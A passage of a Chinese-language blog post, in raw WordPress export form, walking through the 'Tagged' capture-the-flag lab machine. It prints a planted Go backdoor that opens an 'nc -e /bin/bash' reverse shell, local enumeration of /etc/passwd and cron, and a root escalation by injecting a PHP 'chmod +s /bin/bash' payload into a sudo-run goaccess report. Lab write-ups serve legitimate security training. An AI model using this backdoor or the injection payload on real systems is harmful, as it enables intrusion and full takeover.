download magiccode\nmagiccode \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 2.9\/2.9 MB \u2022 9.3 MB\/s \u2022 0:00:00[04:52:15] downloaded 2.89MiB in 0.40 seconds<\/code><\/pre>\n<\/div><\/p>\n\u597d\u590d\u6742\uff0c\u5148\u4e0d\u641e\u8fd9\u4e2a\u3002\u3002\u3002\u3002<\/p>\n
(remote) www-data@tagged:\/home\/shyla$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\numa:x:1000:1000:uma,,,:\/home\/uma:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nshyla:x:1001:1001:,,,:\/home\/shyla:\/bin\/bash\n(remote) www-data@tagged:\/home\/shyla$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@tagged:\/home\/shyla$ cd \/\n(remote) www-data@tagged:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\nlrwxrwxrwx 1 root root 7 Nov 14 2022 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 boot\ndrwxr-xr-x 17 root root 3140 Apr 13 10:26 dev\ndrwxr-xr-x 73 root root 4096 Apr 13 10:26 etc\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 home\nlrwxrwxrwx 1 root root 31 Nov 14 2022 initrd.img -> boot\/initrd.img-5.10.0-19-amd64\nlrwxrwxrwx 1 root root 31 Nov 14 2022 initrd.img.old -> boot\/initrd.img-5.10.0-18-amd64\nlrwxrwxrwx 1 root root 7 Nov 14 2022 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Nov 14 2022 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Nov 14 2022 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Nov 14 2022 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Nov 14 2022 lost+found\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 media\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 mnt\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 opt\ndr-xr-xr-x 141 root root 0 Apr 13 10:26 proc\ndrwx------ 4 root root 4096 Nov 14 2022 root\ndrwxr-xr-x 17 root root 500 Apr 13 10:26 run\nlrwxrwxrwx 1 root root 8 Nov 14 2022 sbin -> usr\/sbin\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 srv\ndr-xr-xr-x 13 root root 0 Apr 13 10:26 sys\ndrwxrwxrwt 9 root root 4096 Apr 13 10:39 tmp\ndrwxr-xr-x 14 root root 4096 Nov 14 2022 usr\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 var\nlrwxrwxrwx 1 root root 28 Nov 14 2022 vmlinuz -> boot\/vmlinuz-5.10.0-19-amd64\nlrwxrwxrwx 1 root root 28 Nov 14 2022 vmlinuz.old -> boot\/vmlinuz-5.10.0-18-amd64\n(remote) www-data@tagged:\/$ cd opt\n(remote) www-data@tagged:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\n(remote) www-data@tagged:\/opt$ cd \/tmp;ls -la\ntotal 36\ndrwxrwxrwt 9 root root 4096 Apr 13 10:39 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .ICE-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .Test-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .X11-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .XIM-unix\ndrwxrwxrwt 2 root root 4096 Apr 13 10:26 .font-unix\ndrwx------ 3 root root 4096 Apr 13 10:26 systemd-private-c17be820856f4776a84d72e729eed924-systemd-logind.service-xX0pSg\ndrwx------ 3 root root 4096 Apr 13 10:26 systemd-private-c17be820856f4776a84d72e729eed924-systemd-timesyncd.service-qWsaHi\n(remote) www-data@tagged:\/tmp$ cd \/var\/www\/html;ls -la\ntotal 20\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 ..\n-rw-r--r-- 1 root root 46 Nov 14 2022 index.html\n-rwxrwxr-- 1 www-data shyla 93 Apr 13 10:38 index.php\n-rw-r--r-- 1 root root 982 Nov 14 2022 magiccode.go\nlrwxrwxrwx 1 root root 24 Nov 14 2022 report.html -> \/var\/www\/html\/report.php\n-rwxrwxr-- 1 uma uma 0 Nov 14 2022 report.php\n(remote) www-data@tagged:\/var\/www\/html$ file magiccode.go \nmagiccode.go: C source, ASCII text\n(remote) www-data@tagged:\/var\/www\/html$ cat magiccode.go \npackage main\n\nimport (\n "bufio"\n "fmt"\n "net"\n "os"\n"log"\n"os\/exec"\n"strings"\n)\n\nfunc main() {\n ln, _ := net.Listen("tcp", ":7746")\n for {\n conn, _ := ln.Accept()\n go receiveData(conn)\n go sendData(conn, "")\n }\n}\n\nfunc sendData(conn net.Conn,mensaje string) {\n fmt.Fprintf(conn, mensaje)\n}\n\nfunc receiveData(conn net.Conn){\n for {\n var tohtml string\n sendData(conn, ">")\n message, _ := bufio.NewReader(conn).ReadString('\\n')\n message = strings.TrimRight(message, "\\r\\n")\n tohtml = "<pre>"+message+"<\/pre>"\n OMG := "Deva"\n if message == OMG {\n cmd := exec.Command("nc","-e","\/bin\/bash","127.0.0.1","7777")\n _ = cmd.Run()\n }\n file, err := os.OpenFile("\/var\/www\/html\/index.php", os.O_APPEND|os.O_WRONLY, 0644)\n _, _ = fmt.Fprintln(file, tohtml)\n if err != nil {\n log.Fatal(err)\n }\n defer file.Close()\n }\n}<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u53cd\u5f39shell\u3002\u3002\u3002\u3002<\/p>\n
<\/div>
\n<\/div><\/p>\n\u6269\u5c55\u4e00\u4e0b\uff1a<\/p>\n
whoami;id\nshyla\nuid=1001(shyla) gid=1001(shyla) grupos=1001(shyla)\nscript \/dev\/null -c \/bin\/bash\nScript iniciado, el fichero de anotaci\u00f3n de salida es '\/dev\/null'.\nshyla@tagged:~$ ls -la\nls -la\ntotal 2856\ndrwxr-xr-x 3 shyla shyla 4096 nov 14 2022 .\ndrwxr-xr-x 4 root root 4096 nov 14 2022 ..\nlrwxrwxrwx 1 shyla shyla 9 nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 shyla shyla 220 nov 14 2022 .bash_logout\n-rw-r--r-- 1 shyla shyla 3526 nov 14 2022 .bashrc\ndrwxr-xr-x 3 shyla shyla 4096 nov 14 2022 .local\n-rwxr-xr-x 1 shyla shyla 2887781 nov 14 2022 magiccode\n-rw-r--r-- 1 shyla shyla 807 nov 14 2022 .profile\n-rw-r--r-- 1 shyla shyla 66 nov 14 2022 .selected_editor\n-rw------- 1 shyla shyla 13 nov 14 2022 user.txt\nshyla@tagged:~$ cat user.txt\ncat user.txt\ng0disah4ck3r\nshyla@tagged:~$ sudo -l\nsudo -l\nMatching Defaults entries for shyla on tagged:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser shyla may run the following commands on tagged:\n (uma) NOPASSWD: \/usr\/bin\/goaccess\n (ALL) NOPASSWD: \/usr\/bin\/php \/var\/www\/html\/report.php\nshyla@tagged:~$ cat \/var\/www\/html\/report.php\ncat \/var\/www\/html\/report.php\nshyla@tagged:~$ file \/usr\/bin\/goaccess\nfile \/usr\/bin\/goaccess\n\/usr\/bin\/goaccess: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=1366b6cf356515bf1cc544825c8ea3d952208409, for GNU\/Linux 3.2.0, stripped\nshyla@tagged:~$ \/usr\/bin\/goaccess\n\/usr\/bin\/goaccess\nError opening terminal: unknown.<\/code><\/pre>\n\u67e5\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\u73a9\u610f\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\nGoAccess<\/strong>\u662f\u4e00\u4e2a\u5f00\u6e90\u5b9e\u65f6**<\/strong>Web \u65e5\u5fd7\u5206\u6790\u5668*\u548c\u4ea4\u4e92\u5f0f\u67e5\u770b\u5668\uff0c\u53ef\u5728 <\/em>nix \u7cfb\u7edf\u7684\u7ec8\u7aef\u4e2d\u6216\u901a\u8fc7**<\/strong>\u6d4f\u89c8\u5668**\u8fd0\u884c\u3002<\/p>\n\u5b83\u4e3a\u9700\u8981\u52a8\u6001\u53ef\u89c6\u5316\u670d\u52a1\u5668\u62a5\u544a\u7684\u7cfb\u7edf\u7ba1\u7406\u5458 \u63d0\u4f9b\u5feb\u901f\u4e14\u6709\u4ef7\u503c\u7684 HTTP \u7edf\u8ba1\u4fe1\u606f\u3002<\/strong><\/p>\n<\/blockquote>\n\u5c31\u662f\u67e5\u770b\u65e5\u5fd7\u7684\uff0c\u770b\u4e00\u4e0b\u6709\u65e0payload\uff0c\u4f46\u662f\u6ca1\u6709\u627e\u5230\uff1a<\/p>\n
shyla@tagged:~$ \/usr\/bin\/goaccess -h\n\/usr\/bin\/goaccess -h\n\/usr\/bin\/goaccess -h\nGoAccess - 1.4\nUsage: goaccess [filename] [ options ... ] [-c][-M][-H][-S][-q][-d][...]\nThe following options can also be supplied to the command:\n\nLOG & DATE FORMAT OPTIONS\n --date-format=<dateformat> - Specify log date format. e.g., %d\/%b\/%Y\n --log-format=<logformat> - Specify log format. Inner quotes need escaping, or use single quotes.\n --time-format=<timeformat> - Specify log time format. e.g., %H:%M:%S\n\nUSER INTERFACE OPTIONS\n -c --config-dialog - Prompt log\/date\/time configuration window.\n -i --hl-header - Color highlight active panel.\n -m --with-mouse - Enable mouse support on main dashboard.\n --color=<fg:bg[attrs, PANEL]> - Specify custom colors. See manpage for more details.\n --color-scheme=<1|2|3> - Schemes: 1 => Grey, 2 => Green, 3 => Monokai.\n --html-custom-css=<path.css> - Specify a custom CSS file in the HTML report.\n --html-custom-js=<path.js> - Specify a custom JS file in the HTML report.\n --html-prefs=<json_obj> - Set default HTML report preferences.\n --html-report-title=<title> - Set HTML report page title and header.\n --json-pretty-print - Format JSON output w\/ tabs & newlines.\n --max-items - Maximum number of items to show per panel. See man page for limits.\n --no-color - Disable colored output.\n --no-column-names - Don't write column names in term output.\n --no-csv-summary - Disable summary metrics on the CSV output.\n --no-html-last-updated - Hide HTML last updated field.\n --no-parsing-spinner - Disable progress metrics and parsing spinner.\n --no-progress - Disable progress metrics.\n --no-tab-scroll - Disable scrolling through panels on TAB.\n\nSERVER OPTIONS\n --addr=<addr> - Specify IP address to bind server to.\n --daemonize - Run as daemon (if --real-time-html enabled).\n --fifo-in=<path> - Path to read named pipe (FIFO).\n --fifo-out=<path> - Path to write named pipe (FIFO).\n --origin=<addr> - Ensure clients send this origin header upon the WebSocket handshake.\n --pid-file=<path> - Write PID to a file when --daemonize is used.\n --port=<port> - Specify the port to use.\n --real-time-html - Enable real-time HTML output.\n --ssl-cert=<cert.crt> - Path to TLS\/SSL certificate.\n --ssl-key=<priv.key> - Path to TLS\/SSL private key.\n --user-name=<username> - Run as the specified user.\n --ws-url=<url> - URL to which the WebSocket server responds.\n\nFILE OPTIONS\n - - The log file to parse is read from stdin.\n -f --log-file=<filename> - Path to input log file.\n -l --debug-file=<filename> - Send all debug messages to the specified file.\n -p --config-file=<filename> - Custom configuration file.\n -S --log-size=<number> - Specify the log size, useful when piping in logs.\n --invalid-requests=<filename> - Log invalid requests to the specified file.\n --no-global-config - Don't load global configuration file.\n\nPARSE OPTIONS\n -a --agent-list - Enable a list of user-agents by host.\n -b --browsers-file=<path> - Use additional custom list of browsers.\n -d --with-output-resolver - Enable IP resolver on HTML|JSON output.\n -e --exclude-ip=<IP> - Exclude one or multiple IPv4\/6. Allows IP ranges\n e.g. 192.168.0.1-192.168.0.10\n -H --http-protocol=<yes|no> - Set\/unset HTTP request protocol if found.\n -M --http-method=<yes|no> - Set\/unset HTTP request method if found.\n -o --output=file.html|json|csv - Output either an HTML, JSON or a CSV file.\n -q --no-query-string - Strip request's query string. This can decrease memory consumption.\n -r --no-term-resolver - Disable IP resolver on terminal output.\n --444-as-404 - Treat non-standard status code 444 as 404.\n --4xx-to-unique-count - Add 4xx client errors to the unique visitors count.\n --all-static-files - Include static files with a query string.\n --anonymize-ip - Anonymize IP addresses before outputting to report.\n --crawlers-only - Parse and display only crawlers.\n --date-spec=<date|hr> - Date specificity. Possible values: `date` (default), or `hr`.\n --double-decode - Decode double-encoded values.\n --enable-panel=<PANEL> - Enable parsing\/displaying the given panel.\n --hide-referer=<NEEDLE> - Hide a referer but still count it. Wild cards are allowed.\n i.e., *.bing.com\n --hour-spec=<hr|min> - Hour specificity. Possible values: `hr` (default),\n or `min` (tenth of a min).\n --ignore-crawlers - Ignore crawlers.\n --ignore-panel=<PANEL> - Ignore parsing\/displaying the given panel.\n --ignore-referer=<NEEDLE> - Ignore a referer from being counted. Wild cards are allowed.\n i.e., *.bing.com\n --ignore-statics=<req|panel> - Ignore static requests.\n req => Ignore from valid requests.\n panel => Ignore from valid requests and panels.\n --ignore-status=<CODE> - Ignore parsing the given status code.\n --keep-last=<NDAYS> - Keep the last NDAYS in storage.\n --num-tests=<number> - Number of lines to test. >= 0 (10 default)\n --persist - Persist data to disk on exit to the given --db-path or to \/tmp.\n --process-and-exit - Parse log and exit without outputting data.\n --real-os - Display real OS names. e.g, Windows XP, Snow Leopard.\n --restore - Restore data from disk from the given --db-path or from \/tmp.\n --sort-panel=PANEL,METRIC,ORDER - Sort panel on initial load. e.g., --sort-panel=VISITORS,BY_HITS,ASC.\n See manpage for a list of panels\/fields.\n --static-file=<extension> - Add static file extension. e.g.: .mp3. Extensions are case sensitive.\n\nGEOIP OPTIONS\n --geoip-database=<path> - Specify path to GeoIP database file.\n i.e., GeoLiteCity.dat, GeoIPv6.dat ...\nOTHER OPTIONS\n -h --help - This help.\n -s --storage - Display current storage method. e.g., Hash.\n -V --version - Display version information and exit.\n --dcf - Display the path of the default config file when `-p` is not used.\nExamples can be found by running `man goaccess`.\nFor more details visit: http:\/\/goaccess.io\nGoAccess Copyright (C) 2009-2017 by Gerardo Orellana<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
shyla@tagged:\/tmp$ touch exp.log\ntouch exp.log\ntouch exp.log\nshyla@tagged:\/tmp$ sudo -l\nsudo -l\nsudo -l\nMatching Defaults entries for shyla on tagged:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser shyla may run the following commands on tagged:\n (uma) NOPASSWD: \/usr\/bin\/goaccess\n (ALL) NOPASSWD: \/usr\/bin\/php \/var\/www\/html\/report.php\nshyla@tagged:\/tmp$ sudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html\nsudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html\n<in\/goaccess -f exp.log -o \/var\/www\/html\/report.html\n\nshyla@tagged:\/tmp$ head \/var\/www\/html\/report.php \nhead \/var\/www\/html\/report.php\nhead \/var\/www\/html\/report.php\n<!DOCTYPE html><html lang='es'><head><meta charset='UTF-8'><meta name='referrer' content='no-referrer'><meta http-equiv='X-UA-Compatible' content='IE=edge'><meta name='google' content='notranslate'><meta name='viewport' content='width=device-width, initial-scale=1'><meta name='robots' content='noindex, nofollow'><link rel='icon' href='data:image\/x-icon;base64,AAABAAEAEBAQAAEABAAoAQAAFgAAACgAAAAQAAAAIAAAAAEABAAAAAAAgAAAAAAAAAAAAAAAEAAAAAAAAADGxsYAWFhYABwcHABfAP8A\/9dfAADXrwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIiIiIiIiIiIjMlUkQgAiIiIiIiIiIiIiIzJVJEIAAAIiIiIiIiIiIiMyVSRCAAIiIiIiIiIiIiIRERERERERERERERERERERIiIiIiIiIiIgACVVUiIiIiIiIiIiIiIiIAAlVVIiIiIiIiIiIiIiIhEREREREREREREREREREREAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' type='image\/x-icon' \/><title>Estadisticas de Servidor<\/title><style>@font-face {font-family: 'fa';src: url(data:application\/font-woff;charset=utf-8;base64,d09GRgABAAAAAC2sAAsAAAAALWAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABCAAAAGAAAABgDxIPHGNtYXAAAAFoAAABbAAAAWzzYPN8Z2FzcAAAAtQAAAAIAAAACAAAABBnbHlmAAAC3AAAJ7QAACe0PqRPf2hlYWQAACqQAAAANgAAADYSBhrHaGhlYQAAKsgAAAAkAAAAJAhUBIZobXR4AAAq7AAAAMwAAADMpCoCC2xvY2EAACu4AAAAaAAAAGjyrvuebWF4cAAALCAAAAAgAAAAIAA+AVduYW1lAAAsQAAAAUoAAAFKIhW<\/code><\/pre>\n\u590d\u5236\u4e0b\u6765\u67e5\u770b\u4e00\u4e0b\u662f\u5565\uff1a<\/p>\n
<\/div><\/p>\n\u662f\u4ed6\u751f\u6210\u7684\u65e5\u5fd7\u6587\u6863\uff01\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
sudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-custom-js=exp.js\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\n# \u5931\u8d25\nsudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-report-title="<?php system('chmod +s \/bin\/bash');?>"\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\n# \u6210\u529f<\/code><\/pre>\n.....\non (_) {if (!arguments.length) return yValue1;yValue1 = _;return chart;};return chart;}<\/script><script src='exp.js'><\/script><\/body><\/html>shyla@tagged:\/tmp$ whoami;id\nwhoami;id\nwhoami;id\nshyla\nuid=1001(shyla) gid=1001(shyla) grupos=1001(shyla)\nshyla@tagged:\/tmp$ sudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-report-title="<?php system('chmod +s \/bin\/bash');?>"\nsudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-report-title="<?php system('chmod +s \/bin\/bash');?>"\n<eport-title="<?php system('chmod +s \/bin\/bash');?>"\n\nshyla@tagged:\/tmp$ sudo \/usr\/bin\/php \/var\/www\/html\/report.php\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\n.....\nreturn chart;};chart.y1 = function (_) {if (!arguments.length) return yValue1;yValue1 = _;return chart;};return chart;}<\/script><\/body><\/html>shyla@tagged:\/tmp$ ls -l \/bin\/bash\nls -l \/bin\/bash\nls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 mar 27 2022 \/bin\/bash\nshyla@tagged:\/tmp$ bash -p\nbash -p\nbash -p\nbash-5.1# whoami;id\nwhoami;id\nwhoami;id\nroot\nuid=1001(shyla) gid=1001(shyla) euid=0(root) egid=0(root) grupos=0(root),1001(shyla)\nbash-5.1# cd \/root;ls -la\ncd \/root;ls -la\ncd \/root;ls -la\ntotal 32\ndrwx------ 4 root root 4096 nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 nov 14 2022 ..\nlrwxrwxrwx 1 root root 9 nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 abr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 nov 14 2022 .cache\ndrwxr-xr-x 3 root root 4096 nov 14 2022 .local\n-rw-r--r-- 1 root root 161 jul 9 2019 .profile\n-rw------- 1 root root 12 nov 14 2022 root.txt\n-rw-r--r-- 1 root root 161 nov 14 2022 .wget-hsts\nbash-5.1# cat root.txt\ncat root.txt\ncat root.txt\nHMVrep0rtz!<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Tagged \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.4 — -A Open 172 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-546","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=546"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/546\/revisions"}],"predecessor-version":[{"id":547,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/546\/revisions\/547"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=546"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240413155311235\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729298.png\")
<\/div><\/p>\n![\"image-20240413154625500\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729299.png\")
<\/div><\/p>\n![\"image-20240413155209380\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729300.png\")
<\/div><\/p>\n![\"image-20240413155551309\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729301.png\")
<\/div><\/p>\n![\"image-20240413155845442\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729302.png\")
<\/div>![\"image-20240413155831291\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729303.png\")
<\/div><\/p>\n![\"image-20240413162816932\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729304.png\")
<\/div><\/p>\n![\"image-20240413164416780\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729305.png\")
<\/div><\/p>\n![\"image-20240413163840142\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729306.png\")
<\/div>![\"image-20240413163849913\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729307.png\")
<\/div>![\"image-20240413163858061\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729308.png\")
<\/div><\/p>\n![\"image-20240413165421385\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729309.png\")
<\/div><\/p>\n![\"image-20240413165713283\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729310.png\")
<\/div>![\"image-20240413165707070\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729311.png\")
<\/div><\/p>\n![\"image-20240413170051515\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729312.png\")
<\/div>![\"image-20240413170150993\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729314.png\")
<\/div><\/p>\n![\"image-20240413172835251\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131729315.png\")
<\/div><\/p>\n